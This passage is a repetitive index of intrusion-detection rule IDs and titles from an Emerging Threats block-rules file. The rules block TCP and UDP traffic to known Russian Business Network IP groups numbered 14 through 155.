(emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network IP UDP - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network IP TCP - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407029 - ET RBN Known Russian Business Network IP UDP - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network IP TCP - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407031 - ET RBN Known Russian Business Network IP UDP - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407032 - ET RBN Known Russian Business Network IP TCP - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407033 - ET RBN Known Russian Business Network IP UDP - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407034 - ET RBN Known Russian Business Network IP TCP - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407035 - ET RBN Known Russian Business Network IP UDP - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407036 - ET RBN Known Russian Business Network IP TCP - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407037 - ET RBN Known Russian Business Network IP UDP - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407038 - ET RBN Known Russian Business Network IP TCP - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407039 - ET RBN Known Russian Business Network IP UDP - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407040 - ET RBN Known Russian Business Network IP TCP - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407041 - ET RBN Known Russian Business Network IP UDP - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407042 - ET RBN Known Russian Business Network IP TCP - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407043 - ET RBN Known Russian Business Network IP UDP - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407044 - ET RBN Known Russian Business Network IP TCP - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407045 - ET RBN Known Russian Business Network IP UDP - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407046 - ET RBN Known Russian Business Network IP TCP - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407047 - ET RBN Known Russian Business Network IP UDP - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407048 - ET RBN Known Russian Business Network IP TCP - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407049 - ET RBN Known Russian Business Network IP UDP - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407050 - ET RBN Known Russian Business Network IP TCP - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407051 - ET RBN Known Russian Business Network IP UDP - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407052 - ET RBN Known Russian Business Network IP TCP - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407053 - ET RBN Known Russian Business Network IP UDP - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407054 - ET RBN Known Russian Business Network IP TCP - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407055 - ET RBN Known Russian Business Network IP UDP - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407056 - ET RBN Known Russian Business Network IP TCP - BLOCKING (29) (emerging-rbn-BLOCK.rules) 2407057 - ET RBN Known Russian Business Network IP UDP - BLOCKING (29) (emerging-rbn-BLOCK.rules) 2407058 - ET RBN Known Russian Business Network IP TCP - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407059 - ET RBN Known Russian Business Network IP UDP - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407060 - ET RBN Known Russian Business Network IP TCP - BLOCKING (31) (emerging-rbn-BLOCK.rules) 2407061 - ET RBN Known Russian Business Network IP UDP - BLOCKING (31) (emerging-rbn-BLOCK.rules) 2407062 - ET RBN Known Russian Business Network IP TCP - BLOCKING (32) (emerging-rbn-BLOCK.rules) 2407063 - ET RBN Known Russian Business Network IP UDP - BLOCKING (32) (emerging-rbn-BLOCK.rules) 2407064 - ET RBN Known Russian Business Network IP TCP - BLOCKING (33) (emerging-rbn-BLOCK.rules) 2407065 - ET RBN Known Russian Business Network IP UDP - BLOCKING (33) (emerging-rbn-BLOCK.rules) 2407066 - ET RBN Known Russian Business Network IP TCP - BLOCKING (34) (emerging-rbn-BLOCK.rules) 2407067 - ET RBN Known Russian Business Network IP UDP - BLOCKING (34) (emerging-rbn-BLOCK.rules) 2407068 - ET RBN Known Russian Business Network IP TCP - BLOCKING (35) (emerging-rbn-BLOCK.rules) 2407069 - ET RBN Known Russian Business Network IP UDP - BLOCKING (35) (emerging-rbn-BLOCK.rules) 2407070 - ET RBN Known Russian Business Network IP TCP - BLOCKING (36) (emerging-rbn-BLOCK.rules) 2407071 - ET RBN Known Russian Business Network IP UDP - BLOCKING (36) (emerging-rbn-BLOCK.rules) 2407072 - ET RBN Known Russian Business Network IP TCP - BLOCKING (37) (emerging-rbn-BLOCK.rules) 2407073 - ET RBN Known Russian Business Network IP UDP - BLOCKING (37) (emerging-rbn-BLOCK.rules) 2407074 - ET RBN Known Russian Business Network IP TCP - BLOCKING (38) (emerging-rbn-BLOCK.rules) 2407075 - ET RBN Known Russian Business Network IP UDP - BLOCKING (38) (emerging-rbn-BLOCK.rules) 2407076 - ET RBN Known Russian Business Network IP TCP - BLOCKING (39) (emerging-rbn-BLOCK.rules) 2407077 - ET RBN Known Russian Business Network IP UDP - BLOCKING (39) (emerging-rbn-BLOCK.rules) 2407078 - ET RBN Known Russian Business Network IP TCP - BLOCKING (40) (emerging-rbn-BLOCK.rules) 2407079 - ET RBN Known Russian Business Network IP UDP - BLOCKING (40) (emerging-rbn-BLOCK.rules) 2407080 - ET RBN Known Russian Business Network IP TCP - BLOCKING (41) (emerging-rbn-BLOCK.rules) 2407081 - ET RBN Known Russian Business Network IP UDP - BLOCKING (41) (emerging-rbn-BLOCK.rules) 2407082 - ET RBN Known Russian Business Network IP TCP - BLOCKING (42) (emerging-rbn-BLOCK.rules) 2407083 - ET RBN Known Russian Business Network IP UDP - BLOCKING (42) (emerging-rbn-BLOCK.rules) 2407084 - ET RBN Known Russian Business Network IP TCP - BLOCKING (43) (emerging-rbn-BLOCK.rules) 2407085 - ET RBN Known Russian Business Network IP UDP - BLOCKING (43) (emerging-rbn-BLOCK.rules) 2407086 - ET RBN Known Russian Business Network IP TCP - BLOCKING (44) (emerging-rbn-BLOCK.rules) 2407087 - ET RBN Known Russian Business Network IP UDP - BLOCKING (44) (emerging-rbn-BLOCK.rules) 2407088 - ET RBN Known Russian Business Network IP TCP - BLOCKING (45) (emerging-rbn-BLOCK.rules) 2407089 - ET RBN Known Russian Business Network IP UDP - BLOCKING (45) (emerging-rbn-BLOCK.rules) 2407090 - ET RBN Known Russian Business Network IP TCP - BLOCKING (46) (emerging-rbn-BLOCK.rules) 2407091 - ET RBN Known Russian Business Network IP UDP - BLOCKING (46) (emerging-rbn-BLOCK.rules) 2407092 - ET RBN Known Russian Business Network IP TCP - BLOCKING (47) (emerging-rbn-BLOCK.rules) 2407093 - ET RBN Known Russian Business Network IP UDP - BLOCKING (47) (emerging-rbn-BLOCK.rules) 2407094 - ET RBN Known Russian Business Network IP TCP - BLOCKING (48) (emerging-rbn-BLOCK.rules) 2407095 - ET RBN Known Russian Business Network IP UDP - BLOCKING (48) (emerging-rbn-BLOCK.rules) 2407096 - ET RBN Known Russian Business Network IP TCP - BLOCKING (49) (emerging-rbn-BLOCK.rules) 2407097 - ET RBN Known Russian Business Network IP UDP - BLOCKING (49) (emerging-rbn-BLOCK.rules) 2407098 - ET RBN Known Russian Business Network IP TCP - BLOCKING (50) (emerging-rbn-BLOCK.rules) 2407099 - ET RBN Known Russian Business Network IP UDP - BLOCKING (50) (emerging-rbn-BLOCK.rules) 2407100 - ET RBN Known Russian Business Network IP TCP - BLOCKING (51) (emerging-rbn-BLOCK.rules) 2407101 - ET RBN Known Russian Business Network IP UDP - BLOCKING (51) (emerging-rbn-BLOCK.rules) 2407102 - ET RBN Known Russian Business Network IP TCP - BLOCKING (52) (emerging-rbn-BLOCK.rules) 2407103 - ET RBN Known Russian Business Network IP UDP - BLOCKING (52) (emerging-rbn-BLOCK.rules) 2407104 - ET RBN Known Russian Business Network IP TCP - BLOCKING (53) (emerging-rbn-BLOCK.rules) 2407105 - ET RBN Known Russian Business Network IP UDP - BLOCKING (53) (emerging-rbn-BLOCK.rules) 2407106 - ET RBN Known Russian Business Network IP TCP - BLOCKING (54) (emerging-rbn-BLOCK.rules) 2407107 - ET RBN Known Russian Business Network IP UDP - BLOCKING (54) (emerging-rbn-BLOCK.rules) 2407108 - ET RBN Known Russian Business Network IP TCP - BLOCKING (55) (emerging-rbn-BLOCK.rules) 2407109 - ET RBN Known Russian Business Network IP UDP - BLOCKING (55) (emerging-rbn-BLOCK.rules) 2407110 - ET RBN Known Russian Business Network IP TCP - BLOCKING (56) (emerging-rbn-BLOCK.rules) 2407111 - ET RBN Known Russian Business Network IP UDP - BLOCKING (56) (emerging-rbn-BLOCK.rules) 2407112 - ET RBN Known Russian Business Network IP TCP - BLOCKING (57) (emerging-rbn-BLOCK.rules) 2407113 - ET RBN Known Russian Business Network IP UDP - BLOCKING (57) (emerging-rbn-BLOCK.rules) 2407114 - ET RBN Known Russian Business Network IP TCP - BLOCKING (58) (emerging-rbn-BLOCK.rules) 2407115 - ET RBN Known Russian Business Network IP UDP - BLOCKING (58) (emerging-rbn-BLOCK.rules) 2407116 - ET RBN Known Russian Business Network IP TCP - BLOCKING (59) (emerging-rbn-BLOCK.rules) 2407117 - ET RBN Known Russian Business Network IP UDP - BLOCKING (59) (emerging-rbn-BLOCK.rules) 2407118 - ET RBN Known Russian Business Network IP TCP - BLOCKING (60) (emerging-rbn-BLOCK.rules) 2407119 - ET RBN Known Russian Business Network IP UDP - BLOCKING (60) (emerging-rbn-BLOCK.rules) 2407120 - ET RBN Known Russian Business Network IP TCP - BLOCKING (61) (emerging-rbn-BLOCK.rules) 2407121 - ET RBN Known Russian Business Network IP UDP - BLOCKING (61) (emerging-rbn-BLOCK.rules) 2407122 - ET RBN Known Russian Business Network IP TCP - BLOCKING (62) (emerging-rbn-BLOCK.rules) 2407123 - ET RBN Known Russian Business Network IP UDP - BLOCKING (62) (emerging-rbn-BLOCK.rules) 2407124 - ET RBN Known Russian Business Network IP TCP - BLOCKING (63) (emerging-rbn-BLOCK.rules) 2407125 - ET RBN Known Russian Business Network IP UDP - BLOCKING (63) (emerging-rbn-BLOCK.rules) 2407126 - ET RBN Known Russian Business Network IP TCP - BLOCKING (64) (emerging-rbn-BLOCK.rules) 2407127 - ET RBN Known Russian Business Network IP UDP - BLOCKING (64) (emerging-rbn-BLOCK.rules) 2407128 - ET RBN Known Russian Business Network IP TCP - BLOCKING (65) (emerging-rbn-BLOCK.rules) 2407129 - ET RBN Known Russian Business Network IP UDP - BLOCKING (65) (emerging-rbn-BLOCK.rules) 2407130 - ET RBN Known Russian Business Network IP TCP - BLOCKING (66) (emerging-rbn-BLOCK.rules) 2407131 - ET RBN Known Russian Business Network IP UDP - BLOCKING (66) (emerging-rbn-BLOCK.rules) 2407132 - ET RBN Known Russian Business Network IP TCP - BLOCKING (67) (emerging-rbn-BLOCK.rules) 2407133 - ET RBN Known Russian Business Network IP UDP - BLOCKING (67) (emerging-rbn-BLOCK.rules) 2407134 - ET RBN Known Russian Business Network IP TCP - BLOCKING (68) (emerging-rbn-BLOCK.rules) 2407135 - ET RBN Known Russian Business Network IP UDP - BLOCKING (68) (emerging-rbn-BLOCK.rules) 2407136 - ET RBN Known Russian Business Network IP TCP - BLOCKING (69) (emerging-rbn-BLOCK.rules) 2407137 - ET RBN Known Russian Business Network IP UDP - BLOCKING (69) (emerging-rbn-BLOCK.rules) 2407138 - ET RBN Known Russian Business Network IP TCP - BLOCKING (70) (emerging-rbn-BLOCK.rules) 2407139 - ET RBN Known Russian Business Network IP UDP - BLOCKING (70) (emerging-rbn-BLOCK.rules) 2407140 - ET RBN Known Russian Business Network IP TCP - BLOCKING (71) (emerging-rbn-BLOCK.rules) 2407141 - ET RBN Known Russian Business Network IP UDP - BLOCKING (71) (emerging-rbn-BLOCK.rules) 2407142 - ET RBN Known Russian Business Network IP TCP - BLOCKING (72) (emerging-rbn-BLOCK.rules) 2407143 - ET RBN Known Russian Business Network IP UDP - BLOCKING (72) (emerging-rbn-BLOCK.rules) 2407144 - ET RBN Known Russian Business Network IP TCP - BLOCKING (73) (emerging-rbn-BLOCK.rules) 2407145 - ET RBN Known Russian Business Network IP UDP - BLOCKING (73) (emerging-rbn-BLOCK.rules) 2407146 - ET RBN Known Russian Business Network IP TCP - BLOCKING (74) (emerging-rbn-BLOCK.rules) 2407147 - ET RBN Known Russian Business Network IP UDP - BLOCKING (74) (emerging-rbn-BLOCK.rules) 2407148 - ET RBN Known Russian Business Network IP TCP - BLOCKING (75) (emerging-rbn-BLOCK.rules) 2407149 - ET RBN Known Russian Business Network IP UDP - BLOCKING (75) (emerging-rbn-BLOCK.rules) 2407150 - ET RBN Known Russian Business Network IP TCP - BLOCKING (76) (emerging-rbn-BLOCK.rules) 2407151 - ET RBN Known Russian Business Network IP UDP - BLOCKING (76) (emerging-rbn-BLOCK.rules) 2407152 - ET RBN Known Russian Business Network IP TCP - BLOCKING (77) (emerging-rbn-BLOCK.rules) 2407153 - ET RBN Known Russian Business Network IP UDP - BLOCKING (77) (emerging-rbn-BLOCK.rules) 2407154 - ET RBN Known Russian Business Network IP TCP - BLOCKING (78) (emerging-rbn-BLOCK.rules) 2407155 - ET RBN Known Russian Business Network IP UDP - BLOCKING (78) (emerging-rbn-BLOCK.rules) 2407156 - ET RBN Known Russian Business Network IP TCP - BLOCKING (79) (emerging-rbn-BLOCK.rules) 2407157 - ET RBN Known Russian Business Network IP UDP - BLOCKING (79) (emerging-rbn-BLOCK.rules) 2407158 - ET RBN Known Russian Business Network IP TCP - BLOCKING (80) (emerging-rbn-BLOCK.rules) 2407159 - ET RBN Known Russian Business Network IP UDP - BLOCKING (80) (emerging-rbn-BLOCK.rules) 2407160 - ET RBN Known Russian Business Network IP TCP - BLOCKING (81) (emerging-rbn-BLOCK.rules) 2407161 - ET RBN Known Russian Business Network IP UDP - BLOCKING (81) (emerging-rbn-BLOCK.rules) 2407162 - ET RBN Known Russian Business Network IP TCP - BLOCKING (82) (emerging-rbn-BLOCK.rules) 2407163 - ET RBN Known Russian Business Network IP UDP - BLOCKING (82) (emerging-rbn-BLOCK.rules) 2407164 - ET RBN Known Russian Business Network IP TCP - BLOCKING (83) (emerging-rbn-BLOCK.rules) 2407165 - ET RBN Known Russian Business Network IP UDP - BLOCKING (83) (emerging-rbn-BLOCK.rules) 2407166 - ET RBN Known Russian Business Network IP TCP - BLOCKING (84) (emerging-rbn-BLOCK.rules) 2407167 - ET RBN Known Russian Business Network IP UDP - BLOCKING (84) (emerging-rbn-BLOCK.rules) 2407168 - ET RBN Known Russian Business Network IP TCP - BLOCKING (85) (emerging-rbn-BLOCK.rules) 2407169 - ET RBN Known Russian Business Network IP UDP - BLOCKING (85) (emerging-rbn-BLOCK.rules) 2407170 - ET RBN Known Russian Business Network IP TCP - BLOCKING (86) (emerging-rbn-BLOCK.rules) 2407171 - ET RBN Known Russian Business Network IP UDP - BLOCKING (86) (emerging-rbn-BLOCK.rules) 2407172 - ET RBN Known Russian Business Network IP TCP - BLOCKING (87) (emerging-rbn-BLOCK.rules) 2407173 - ET RBN Known Russian Business Network IP UDP - BLOCKING (87) (emerging-rbn-BLOCK.rules) 2407174 - ET RBN Known Russian Business Network IP TCP - BLOCKING (88) (emerging-rbn-BLOCK.rules) 2407175 - ET RBN Known Russian Business Network IP UDP - BLOCKING (88) (emerging-rbn-BLOCK.rules) 2407176 - ET RBN Known Russian Business Network IP TCP - BLOCKING (89) (emerging-rbn-BLOCK.rules) 2407177 - ET RBN Known Russian Business Network IP UDP - BLOCKING (89) (emerging-rbn-BLOCK.rules) 2407178 - ET RBN Known Russian Business Network IP TCP - BLOCKING (90) (emerging-rbn-BLOCK.rules) 2407179 - ET RBN Known Russian Business Network IP UDP - BLOCKING (90) (emerging-rbn-BLOCK.rules) 2407180 - ET RBN Known Russian Business Network IP TCP - BLOCKING (91) (emerging-rbn-BLOCK.rules) 2407181 - ET RBN Known Russian Business Network IP UDP - BLOCKING (91) (emerging-rbn-BLOCK.rules) 2407182 - ET RBN Known Russian Business Network IP TCP - BLOCKING (92) (emerging-rbn-BLOCK.rules) 2407183 - ET RBN Known Russian Business Network IP UDP - BLOCKING (92) (emerging-rbn-BLOCK.rules) 2407184 - ET RBN Known Russian Business Network IP TCP - BLOCKING (93) (emerging-rbn-BLOCK.rules) 2407185 - ET RBN Known Russian Business Network IP UDP - BLOCKING (93) (emerging-rbn-BLOCK.rules) 2407186 - ET RBN Known Russian Business Network IP TCP - BLOCKING (94) (emerging-rbn-BLOCK.rules) 2407187 - ET RBN Known Russian Business Network IP UDP - BLOCKING (94) (emerging-rbn-BLOCK.rules) 2407188 - ET RBN Known Russian Business Network IP TCP - BLOCKING (95) (emerging-rbn-BLOCK.rules) 2407189 - ET RBN Known Russian Business Network IP UDP - BLOCKING (95) (emerging-rbn-BLOCK.rules) 2407190 - ET RBN Known Russian Business Network IP TCP - BLOCKING (96) (emerging-rbn-BLOCK.rules) 2407191 - ET RBN Known Russian Business Network IP UDP - BLOCKING (96) (emerging-rbn-BLOCK.rules) 2407192 - ET RBN Known Russian Business Network IP TCP - BLOCKING (97) (emerging-rbn-BLOCK.rules) 2407193 - ET RBN Known Russian Business Network IP UDP - BLOCKING (97) (emerging-rbn-BLOCK.rules) 2407194 - ET RBN Known Russian Business Network IP TCP - BLOCKING (98) (emerging-rbn-BLOCK.rules) 2407195 - ET RBN Known Russian Business Network IP UDP - BLOCKING (98) (emerging-rbn-BLOCK.rules) 2407196 - ET RBN Known Russian Business Network IP TCP - BLOCKING (99) (emerging-rbn-BLOCK.rules) 2407197 - ET RBN Known Russian Business Network IP UDP - BLOCKING (99) (emerging-rbn-BLOCK.rules) 2407198 - ET RBN Known Russian Business Network IP TCP - BLOCKING (100) (emerging-rbn-BLOCK.rules) 2407199 - ET RBN Known Russian Business Network IP UDP - BLOCKING (100) (emerging-rbn-BLOCK.rules) 2407200 - ET RBN Known Russian Business Network IP TCP - BLOCKING (101) (emerging-rbn-BLOCK.rules) 2407201 - ET RBN Known Russian Business Network IP UDP - BLOCKING (101) (emerging-rbn-BLOCK.rules) 2407202 - ET RBN Known Russian Business Network IP TCP - BLOCKING (102) (emerging-rbn-BLOCK.rules) 2407203 - ET RBN Known Russian Business Network IP UDP - BLOCKING (102) (emerging-rbn-BLOCK.rules) 2407204 - ET RBN Known Russian Business Network IP TCP - BLOCKING (103) (emerging-rbn-BLOCK.rules) 2407205 - ET RBN Known Russian Business Network IP UDP - BLOCKING (103) (emerging-rbn-BLOCK.rules) 2407206 - ET RBN Known Russian Business Network IP TCP - BLOCKING (104) (emerging-rbn-BLOCK.rules) 2407207 - ET RBN Known Russian Business Network IP UDP - BLOCKING (104) (emerging-rbn-BLOCK.rules) 2407208 - ET RBN Known Russian Business Network IP TCP - BLOCKING (105) (emerging-rbn-BLOCK.rules) 2407209 - ET RBN Known Russian Business Network IP UDP - BLOCKING (105) (emerging-rbn-BLOCK.rules) 2407210 - ET RBN Known Russian Business Network IP TCP - BLOCKING (106) (emerging-rbn-BLOCK.rules) 2407211 - ET RBN Known Russian Business Network IP UDP - BLOCKING (106) (emerging-rbn-BLOCK.rules) 2407212 - ET RBN Known Russian Business Network IP TCP - BLOCKING (107) (emerging-rbn-BLOCK.rules) 2407213 - ET RBN Known Russian Business Network IP UDP - BLOCKING (107) (emerging-rbn-BLOCK.rules) 2407214 - ET RBN Known Russian Business Network IP TCP - BLOCKING (108) (emerging-rbn-BLOCK.rules) 2407215 - ET RBN Known Russian Business Network IP UDP - BLOCKING (108) (emerging-rbn-BLOCK.rules) 2407216 - ET RBN Known Russian Business Network IP TCP - BLOCKING (109) (emerging-rbn-BLOCK.rules) 2407217 - ET RBN Known Russian Business Network IP UDP - BLOCKING (109) (emerging-rbn-BLOCK.rules) 2407218 - ET RBN Known Russian Business Network IP TCP - BLOCKING (110) (emerging-rbn-BLOCK.rules) 2407219 - ET RBN Known Russian Business Network IP UDP - BLOCKING (110) (emerging-rbn-BLOCK.rules) 2407220 - ET RBN Known Russian Business Network IP TCP - BLOCKING (111) (emerging-rbn-BLOCK.rules) 2407221 - ET RBN Known Russian Business Network IP UDP - BLOCKING (111) (emerging-rbn-BLOCK.rules) 2407222 - ET RBN Known Russian Business Network IP TCP - BLOCKING (112) (emerging-rbn-BLOCK.rules) 2407223 - ET RBN Known Russian Business Network IP UDP - BLOCKING (112) (emerging-rbn-BLOCK.rules) 2407224 - ET RBN Known Russian Business Network IP TCP - BLOCKING (113) (emerging-rbn-BLOCK.rules) 2407225 - ET RBN Known Russian Business Network IP UDP - BLOCKING (113) (emerging-rbn-BLOCK.rules) 2407226 - ET RBN Known Russian Business Network IP TCP - BLOCKING (114) (emerging-rbn-BLOCK.rules) 2407227 - ET RBN Known Russian Business Network IP UDP - BLOCKING (114) (emerging-rbn-BLOCK.rules) 2407228 - ET RBN Known Russian Business Network IP TCP - BLOCKING (115) (emerging-rbn-BLOCK.rules) 2407229 - ET RBN Known Russian Business Network IP UDP - BLOCKING (115) (emerging-rbn-BLOCK.rules) 2407230 - ET RBN Known Russian Business Network IP TCP - BLOCKING (116) (emerging-rbn-BLOCK.rules) 2407231 - ET RBN Known Russian Business Network IP UDP - BLOCKING (116) (emerging-rbn-BLOCK.rules) 2407232 - ET RBN Known Russian Business Network IP TCP - BLOCKING (117) (emerging-rbn-BLOCK.rules) 2407233 - ET RBN Known Russian Business Network IP UDP - BLOCKING (117) (emerging-rbn-BLOCK.rules) 2407234 - ET RBN Known Russian Business Network IP TCP - BLOCKING (118) (emerging-rbn-BLOCK.rules) 2407235 - ET RBN Known Russian Business Network IP UDP - BLOCKING (118) (emerging-rbn-BLOCK.rules) 2407236 - ET RBN Known Russian Business Network IP TCP - BLOCKING (119) (emerging-rbn-BLOCK.rules) 2407237 - ET RBN Known Russian Business Network IP UDP - BLOCKING (119) (emerging-rbn-BLOCK.rules) 2407238 - ET RBN Known Russian Business Network IP TCP - BLOCKING (120) (emerging-rbn-BLOCK.rules) 2407239 - ET RBN Known Russian Business Network IP UDP - BLOCKING (120) (emerging-rbn-BLOCK.rules) 2407240 - ET RBN Known Russian Business Network IP TCP - BLOCKING (121) (emerging-rbn-BLOCK.rules) 2407241 - ET RBN Known Russian Business Network IP UDP - BLOCKING (121) (emerging-rbn-BLOCK.rules) 2407242 - ET RBN Known Russian Business Network IP TCP - BLOCKING (122) (emerging-rbn-BLOCK.rules) 2407243 - ET RBN Known Russian Business Network IP UDP - BLOCKING (122) (emerging-rbn-BLOCK.rules) 2407244 - ET RBN Known Russian Business Network IP TCP - BLOCKING (123) (emerging-rbn-BLOCK.rules) 2407245 - ET RBN Known Russian Business Network IP UDP - BLOCKING (123) (emerging-rbn-BLOCK.rules) 2407246 - ET RBN Known Russian Business Network IP TCP - BLOCKING (124) (emerging-rbn-BLOCK.rules) 2407247 - ET RBN Known Russian Business Network IP UDP - BLOCKING (124) (emerging-rbn-BLOCK.rules) 2407248 - ET RBN Known Russian Business Network IP TCP - BLOCKING (125) (emerging-rbn-BLOCK.rules) 2407249 - ET RBN Known Russian Business Network IP UDP - BLOCKING (125) (emerging-rbn-BLOCK.rules) 2407250 - ET RBN Known Russian Business Network IP TCP - BLOCKING (126) (emerging-rbn-BLOCK.rules) 2407251 - ET RBN Known Russian Business Network IP UDP - BLOCKING (126) (emerging-rbn-BLOCK.rules) 2407252 - ET RBN Known Russian Business Network IP TCP - BLOCKING (127) (emerging-rbn-BLOCK.rules) 2407253 - ET RBN Known Russian Business Network IP UDP - BLOCKING (127) (emerging-rbn-BLOCK.rules) 2407254 - ET RBN Known Russian Business Network IP TCP - BLOCKING (128) (emerging-rbn-BLOCK.rules) 2407255 - ET RBN Known Russian Business Network IP UDP - BLOCKING (128) (emerging-rbn-BLOCK.rules) 2407256 - ET RBN Known Russian Business Network IP TCP - BLOCKING (129) (emerging-rbn-BLOCK.rules) 2407257 - ET RBN Known Russian Business Network IP UDP - BLOCKING (129) (emerging-rbn-BLOCK.rules) 2407258 - ET RBN Known Russian Business Network IP TCP - BLOCKING (130) (emerging-rbn-BLOCK.rules) 2407259 - ET RBN Known Russian Business Network IP UDP - BLOCKING (130) (emerging-rbn-BLOCK.rules) 2407260 - ET RBN Known Russian Business Network IP TCP - BLOCKING (131) (emerging-rbn-BLOCK.rules) 2407261 - ET RBN Known Russian Business Network IP UDP - BLOCKING (131) (emerging-rbn-BLOCK.rules) 2407262 - ET RBN Known Russian Business Network IP TCP - BLOCKING (132) (emerging-rbn-BLOCK.rules) 2407263 - ET RBN Known Russian Business Network IP UDP - BLOCKING (132) (emerging-rbn-BLOCK.rules) 2407264 - ET RBN Known Russian Business Network IP TCP - BLOCKING (133) (emerging-rbn-BLOCK.rules) 2407265 - ET RBN Known Russian Business Network IP UDP - BLOCKING (133) (emerging-rbn-BLOCK.rules) 2407266 - ET RBN Known Russian Business Network IP TCP - BLOCKING (134) (emerging-rbn-BLOCK.rules) 2407267 - ET RBN Known Russian Business Network IP UDP - BLOCKING (134) (emerging-rbn-BLOCK.rules) 2407268 - ET RBN Known Russian Business Network IP TCP - BLOCKING (135) (emerging-rbn-BLOCK.rules) 2407269 - ET RBN Known Russian Business Network IP UDP - BLOCKING (135) (emerging-rbn-BLOCK.rules) 2407270 - ET RBN Known Russian Business Network IP TCP - BLOCKING (136) (emerging-rbn-BLOCK.rules) 2407271 - ET RBN Known Russian Business Network IP UDP - BLOCKING (136) (emerging-rbn-BLOCK.rules) 2407272 - ET RBN Known Russian Business Network IP TCP - BLOCKING (137) (emerging-rbn-BLOCK.rules) 2407273 - ET RBN Known Russian Business Network IP UDP - BLOCKING (137) (emerging-rbn-BLOCK.rules) 2407274 - ET RBN Known Russian Business Network IP TCP - BLOCKING (138) (emerging-rbn-BLOCK.rules) 2407275 - ET RBN Known Russian Business Network IP UDP - BLOCKING (138) (emerging-rbn-BLOCK.rules) 2407276 - ET RBN Known Russian Business Network IP TCP - BLOCKING (139) (emerging-rbn-BLOCK.rules) 2407277 - ET RBN Known Russian Business Network IP UDP - BLOCKING (139) (emerging-rbn-BLOCK.rules) 2407278 - ET RBN Known Russian Business Network IP TCP - BLOCKING (140) (emerging-rbn-BLOCK.rules) 2407279 - ET RBN Known Russian Business Network IP UDP - BLOCKING (140) (emerging-rbn-BLOCK.rules) 2407280 - ET RBN Known Russian Business Network IP TCP - BLOCKING (141) (emerging-rbn-BLOCK.rules) 2407281 - ET RBN Known Russian Business Network IP UDP - BLOCKING (141) (emerging-rbn-BLOCK.rules) 2407282 - ET RBN Known Russian Business Network IP TCP - BLOCKING (142) (emerging-rbn-BLOCK.rules) 2407283 - ET RBN Known Russian Business Network IP UDP - BLOCKING (142) (emerging-rbn-BLOCK.rules) 2407284 - ET RBN Known Russian Business Network IP TCP - BLOCKING (143) (emerging-rbn-BLOCK.rules) 2407285 - ET RBN Known Russian Business Network IP UDP - BLOCKING (143) (emerging-rbn-BLOCK.rules) 2407286 - ET RBN Known Russian Business Network IP TCP - BLOCKING (144) (emerging-rbn-BLOCK.rules) 2407287 - ET RBN Known Russian Business Network IP UDP - BLOCKING (144) (emerging-rbn-BLOCK.rules) 2407288 - ET RBN Known Russian Business Network IP TCP - BLOCKING (145) (emerging-rbn-BLOCK.rules) 2407289 - ET RBN Known Russian Business Network IP UDP - BLOCKING (145) (emerging-rbn-BLOCK.rules) 2407290 - ET RBN Known Russian Business Network IP TCP - BLOCKING (146) (emerging-rbn-BLOCK.rules) 2407291 - ET RBN Known Russian Business Network IP UDP - BLOCKING (146) (emerging-rbn-BLOCK.rules) 2407292 - ET RBN Known Russian Business Network IP TCP - BLOCKING (147) (emerging-rbn-BLOCK.rules) 2407293 - ET RBN Known Russian Business Network IP UDP - BLOCKING (147) (emerging-rbn-BLOCK.rules) 2407294 - ET RBN Known Russian Business Network IP TCP - BLOCKING (148) (emerging-rbn-BLOCK.rules) 2407295 - ET RBN Known Russian Business Network IP UDP - BLOCKING (148) (emerging-rbn-BLOCK.rules) 2407296 - ET RBN Known Russian Business Network IP TCP - BLOCKING (149) (emerging-rbn-BLOCK.rules) 2407297 - ET RBN Known Russian Business Network IP UDP - BLOCKING (149) (emerging-rbn-BLOCK.rules) 2407298 - ET RBN Known Russian Business Network IP TCP - BLOCKING (150) (emerging-rbn-BLOCK.rules) 2407299 - ET RBN Known Russian Business Network IP UDP - BLOCKING (150) (emerging-rbn-BLOCK.rules) 2407300 - ET RBN Known Russian Business Network IP TCP - BLOCKING (151) (emerging-rbn-BLOCK.rules) 2407301 - ET RBN Known Russian Business Network IP UDP - BLOCKING (151) (emerging-rbn-BLOCK.rules) 2407302 - ET RBN Known Russian Business Network IP TCP - BLOCKING (152) (emerging-rbn-BLOCK.rules) 2407303 - ET RBN Known Russian Business Network IP UDP - BLOCKING (152) (emerging-rbn-BLOCK.rules) 2407304 - ET RBN Known Russian Business Network IP TCP - BLOCKING (153) (emerging-rbn-BLOCK.rules) 2407305 - ET RBN Known Russian Business Network IP UDP - BLOCKING (153) (emerging-rbn-BLOCK.rules) 2407306 - ET RBN Known Russian Business Network IP TCP - BLOCKING (154) (emerging-rbn-BLOCK.rules) 2407307 - ET RBN Known Russian Business Network IP UDP - BLOCKING (154) (emerging-rbn-BLOCK.rules) 2407308 - ET RBN Known Russian Business Network IP TCP - BLOCKING (155) (emerging-rbn-BLOCK.rules) 2407309 - ET RBN Known Russian Business Network IP UDP - BLOCKING (155) 